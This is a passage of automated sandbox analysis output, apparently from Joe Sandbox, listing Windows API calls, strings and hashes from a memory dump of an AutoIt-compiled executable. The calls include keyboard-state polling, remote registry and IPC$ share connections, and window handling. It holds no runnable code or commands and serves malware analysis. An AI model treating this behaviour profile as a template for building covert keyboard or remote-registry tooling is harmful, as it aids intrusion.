                                                                        • SetForegroundWindow.USER32(00000000), ref: 01030F78
                                                                        • TrackPopupMenuEx.USER32(010A7890,00000000,?,00000000,00000000,00000000), ref: 01030F8B
                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01030F97
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 2751501086-0
                                                                        • Opcode ID: df4507ba94f7d1e53b06c9f3c1bfbad295c29c635bbadee767c3deaa0d889d5a
                                                                        • Instruction ID: 1648345fff43347ff5ff7c0445cecd659eab568d2fc725901f24880bd09e13c3
                                                                        • Opcode Fuzzy Hash: df4507ba94f7d1e53b06c9f3c1bfbad295c29c635bbadee767c3deaa0d889d5a
                                                                        • Instruction Fuzzy Hash: 71710370701709BFFB219B28DC88FAABFA8FF45764F100256F654AA1D4C7B16850DBA0
                                                                        APIs
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • _memset.LIBCMT ref: 01038489
                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010384BE
                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010384DA
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010384F6
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01038520
                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 01038548
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01038553
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01038558
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 1411258926-22481851
                                                                        • Opcode ID: 1797f436918ef2476b866235269cc90a012c2777c7f8b9511516745e61820b58
                                                                        • Instruction ID: 43502314c0097a63828991829deef07e0628b2c15e06e25d136fe7eb557e62f2
                                                                        • Opcode Fuzzy Hash: 1797f436918ef2476b866235269cc90a012c2777c7f8b9511516745e61820b58
                                                                        • Instruction Fuzzy Hash: 6B412872C1022CEBCF21EBA4DC959EDB7B8BF04350F008269F951A3265DB759904DB90
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        • Opcode ID: bc51fbe41f5cefea9d1679a0e7a94a44b4816cd258af682e329fdf1f66601b15
                                                                        • Instruction ID: cd5701503ed1d23af5bf1e2f4a14e946fadafd5e030b54a1976f253e96d91a7e
                                                                        • Opcode Fuzzy Hash: bc51fbe41f5cefea9d1679a0e7a94a44b4816cd258af682e329fdf1f66601b15
                                                                        • Instruction Fuzzy Hash: 4041AE3090425ADBEF01EF54D960AEE7768BF92340F544446FCD2572A5DB30ED19DB60
                                                                        APIs
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                          • Part of subcall function 00FF153B: _memmove.LIBCMT ref: 00FF15C4
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 010458EB
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01045901
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01045912
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01045924
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 01045935
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$_memmove
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 2279737902-1007645807
                                                                        • Opcode ID: 8f4a63f3f1259c814d02825692e422e7fe97ad1b7f82c0fb43567e62c174aeec
                                                                        • Instruction ID: f40edf773e8f5148e6e7a7ce488bc2edf2df55a9979c90fd70e0047c26e8aec0
                                                                        • Opcode Fuzzy Hash: 8f4a63f3f1259c814d02825692e422e7fe97ad1b7f82c0fb43567e62c174aeec
                                                                        • Instruction Fuzzy Hash: F111E27095012DFADB20E7B6DC9ADFF7B7CFF92B60F404429BD81A60A0DAA00D00D5A0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 208665112-3771769585
                                                                        • Opcode ID: 5baba895c04cfc064311971d468a37f98583b4ed3d1b15e57e3748a828794544
                                                                        • Instruction ID: 3406d84e8c859fef464551ef95b731fadd3c0dcc9a1c3db22521d01c0ae09ddd
                                                                        • Opcode Fuzzy Hash: 5baba895c04cfc064311971d468a37f98583b4ed3d1b15e57e3748a828794544
                                                                        • Instruction Fuzzy Hash: 3F11277190410DABEBA2A7649C88EEA77ECDF41710F0842BAF0C9E60C4EF7595818B54
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 01045535
                                                                          • Part of subcall function 0100083E: timeGetTime.WINMM(?,00000002,00FEC22C), ref: 01000842
                                                                        • Sleep.KERNEL32(0000000A), ref: 01045561
                                                                        • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 01045585
                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 010455A7
                                                                        • SetActiveWindow.USER32 ref: 010455C6
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 010455D4
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 010455F3
                                                                        • Sleep.KERNEL32(000000FA), ref: 010455FE
                                                                        • IsWindow.USER32 ref: 0104560A
                                                                        • EndDialog.USER32(00000000), ref: 0104561B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1194449130-3405671355
                                                                        • Opcode ID: c4e1a1e23224fdf927b716f10f28ab5591fabd180870f00c866cf4f94a1f1e96
                                                                        • Instruction ID: 8e1fac2ae422a1cf8244fe4dfe652bd61264192be454d51679e5e887d487e7a1
                                                                        • Opcode Fuzzy Hash: c4e1a1e23224fdf927b716f10f28ab5591fabd180870f00c866cf4f94a1f1e96
                                                                        • Instruction Fuzzy Hash: 8721C2F0604605AFE7A16BB4ECC8B263B6AFB49745F505229F5C1D218CCB7B4940CB61
                                                                        APIs
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • CoInitialize.OLE32(00000000), ref: 0104DC2D
                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0104DCC0
                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0104DCD4
                                                                        • CoCreateInstance.OLE32(01073D4C,00000000,00000001,0109B86C,?), ref: 0104DD20
                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0104DD8F
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0104DDE7
                                                                        • _memset.LIBCMT ref: 0104DE24
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0104DE60
                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0104DE83
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0104DE8A
                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0104DEC1
                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0104DEC3
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                        • String ID:
                                                                        • API String ID: 1246142700-0
                                                                        • Opcode ID: d651829c1fcfc0ea13ec403b9caa3ad0326d81d1079dfe4cd7632b4281996b40
                                                                        • Instruction ID: 1ac9ecbd7236e397fb93231a3854fcfe9291ff97dfe49d644e4ca0b2aae93f3b
                                                                        • Opcode Fuzzy Hash: d651829c1fcfc0ea13ec403b9caa3ad0326d81d1079dfe4cd7632b4281996b40
                                                                        • Instruction Fuzzy Hash: 5CB1F975A00109AFDB14EFA5C888DAEBBF9FF88314B1484A9F945EB251DB31ED41CB50
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 01040896
                                                                        • SetKeyboardState.USER32(?), ref: 01040901
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 01040921
                                                                        • GetKeyState.USER32(000000A0), ref: 01040938
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 01040967
                                                                        • GetKeyState.USER32(000000A1), ref: 01040978
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 010409A4
                                                                        • GetKeyState.USER32(00000011), ref: 010409B2
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 010409DB
                                                                        • GetKeyState.USER32(00000012), ref: 010409E9
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 01040A12
                                                                        • GetKeyState.USER32(0000005B), ref: 01040A20
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 636a38ac3d7709b6e9638cab5b1e4d216e381bedd7fb56d556592770397b5de9
                                                                        • Instruction ID: bbd20290a45ebef639620052e1efa2db02a602da52dc7c4e619b1cc39e174d0b
                                                                        • Opcode Fuzzy Hash: 636a38ac3d7709b6e9638cab5b1e4d216e381bedd7fb56d556592770397b5de9
                                                                        • Instruction Fuzzy Hash: DE510AB4A043852BFB75E7B449907EABFF48F01280F0845ED97C2671C7DA64A68CC7A1
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 0103CE1C
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0103CE2E
                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0103CE8C
                                                                        • GetDlgItem.USER32(?,00000002), ref: 0103CE97
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0103CEA9
                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0103CEFD
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0103CF0B
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0103CF1C
                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0103CF5F
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0103CF6D
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0103CF8A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0103CF97
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: 092ac8f1e90fbe72c159e73302375414ec2fa19c74bbeb4ce9faf824403eb8a0
                                                                        • Instruction ID: 0131f4b2b2b90f4fb930c53d8e93d67a8d6b0b8c42ff9a967862684beaa8dfbf
                                                                        • Opcode Fuzzy Hash: 092ac8f1e90fbe72c159e73302375414ec2fa19c74bbeb4ce9faf824403eb8a0
                                                                        • Instruction Fuzzy Hash: A9515171F00205AFDB18CF6DCD95A6EBBF9FB88711F14826DF515E6284D771A9008B50
                                                                        APIs
                                                                          • Part of subcall function 00FE1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FE2412,?,00000000,?,?,?,?,00FE1AA7,00000000,?), ref: 00FE1F76
                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FE24AF
                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00FE1AA7,00000000,?,?,00FE1EBE,?,?), ref: 00FE254A
                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0101BFE7
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FE1AA7,00000000,?,?,00FE1EBE,?,?), ref: 0101C018
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FE1AA7,00000000,?,?,00FE1EBE,?,?), ref: 0101C02F
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FE1AA7,00000000,?,?,00FE1EBE,?,?), ref: 0101C04B
                                                                        • DeleteObject.GDI32(00000000), ref: 0101C05D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 641708696-0
                                                                        • Opcode ID: 21742ee1354695c4a6d4f341fbf74b62810e8d71f9127271db02af2c823bd7b7
                                                                        • Instruction ID: 7f19acc6d00d366d0cad5e7a57767f3063f409e9ba9db34e87c0069faa7fd6b4
                                                                        • Opcode Fuzzy Hash: 21742ee1354695c4a6d4f341fbf74b62810e8d71f9127271db02af2c823bd7b7
                                                                        • Instruction Fuzzy Hash: F161C231940780DFE776DF19C948B2AB7F5FB41312F508659F0C256999C37AA881EF90
                                                                        APIs
                                                                          • Part of subcall function 00FE29AB: GetWindowLongW.USER32(?,000000EB), ref: 00FE29BC
                                                                        • GetSysColor.USER32(0000000F), ref: 00FE25AF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ColorLongWindow
                                                                        • String ID:
                                                                        • API String ID: 259745315-0
                                                                        • Opcode ID: ef45a4a2b18ae4c57738c035f7c630883f1be18b25d938a3e58a8247be6d189b
                                                                        • Instruction ID: 0c8e4b6dcddcfa19d7bd53688f20fe14b8ef5fee48c7a86f895340c6577c3cce
                                                                        • Opcode Fuzzy Hash: ef45a4a2b18ae4c57738c035f7c630883f1be18b25d938a3e58a8247be6d189b
                                                                        • Instruction Fuzzy Hash: FE41EA314001849FDB715F29D888BB93B6AFB06335F184361FDA59A1D9E7358C41EB21
                                                                        APIs
                                                                          • Part of subcall function 01000B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FF2A3E,?,00008000), ref: 01000BA7
                                                                          • Part of subcall function 01000284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF2A58,?,00008000), ref: 010002A4
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FF2ADF
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FF2C2C
                                                                          • Part of subcall function 00FF3EBE: _wcscpy.LIBCMT ref: 00FF3EF6
                                                                          • Part of subcall function 0100386D: _iswctype.LIBCMT ref: 01003875
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                        • API String ID: 537147316-3738523708
                                                                        • Opcode ID: d1320ea809e8b2518b6ffefdf5b0da24fb0da232358417f6bdb6dc41e4b2311b
                                                                        • Instruction ID: d3699f5024c16444555f66fce2a62c9f454c580cb776ccb230f920949e2393bd
                                                                        • Opcode Fuzzy Hash: d1320ea809e8b2518b6ffefdf5b0da24fb0da232358417f6bdb6dc41e4b2311b
                                                                        • Instruction Fuzzy Hash: 4702BA315083469FC764EF24C880AAFBBE5BF99354F00491DF6DA932A1DB34DA49DB42
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,01070980), ref: 0104AF4E
                                                                        • GetDriveTypeW.KERNEL32(00000061,0109B5F0,00000061), ref: 0104B018
                                                                        • _wcscpy.LIBCMT ref: 0104B042
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 2820617543-1000479233
                                                                        • Opcode ID: 06265e697144025b986e7620c28dcb7f46ae2b7e0f701ade8b4ef672e4c2141a
                                                                        • Instruction ID: 134170a3cfcf29b5a166aadaa35981cc66ad9e5eb44583e1aaf3836e15f5e541
                                                                        • Opcode Fuzzy Hash: 06265e697144025b986e7620c28dcb7f46ae2b7e0f701ade8b4ef672e4c2141a
                                                                        • Instruction Fuzzy Hash: 7951CAB02483059BD720EF18CC91AAEBBE5FFA0750F50482DF5D6572E1EB31E909CA52
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __i64tow__itow__swprintf
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 421087845-2263619337
                                                                        • Opcode ID: 0fb9638b04454f1988d9c0d06b60036ede03551bcde61a96887d9521cfc89486
                                                                        • Instruction ID: cd507e7c116c3b9c23ed611f46f6799169956d928d6009ad33ccba4c3407250f
                                                                        • Opcode Fuzzy Hash: 0fb9638b04454f1988d9c0d06b60036ede03551bcde61a96887d9521cfc89486
                                                                        • Instruction Fuzzy Hash: 0641F6729042099FEB35DF68DC45EBA77E8FB04310F2044AEE189D7295EA35A901E710
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0106778F
                                                                        • CreateMenu.USER32 ref: 010677AA
                                                                        • SetMenu.USER32(?,00000000), ref: 010677B9
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01067846
                                                                        • IsMenu.USER32(?), ref: 0106785C
                                                                        • CreatePopupMenu.USER32 ref: 01067866
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01067893
                                                                        • DrawMenuBar.USER32 ref: 0106789B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
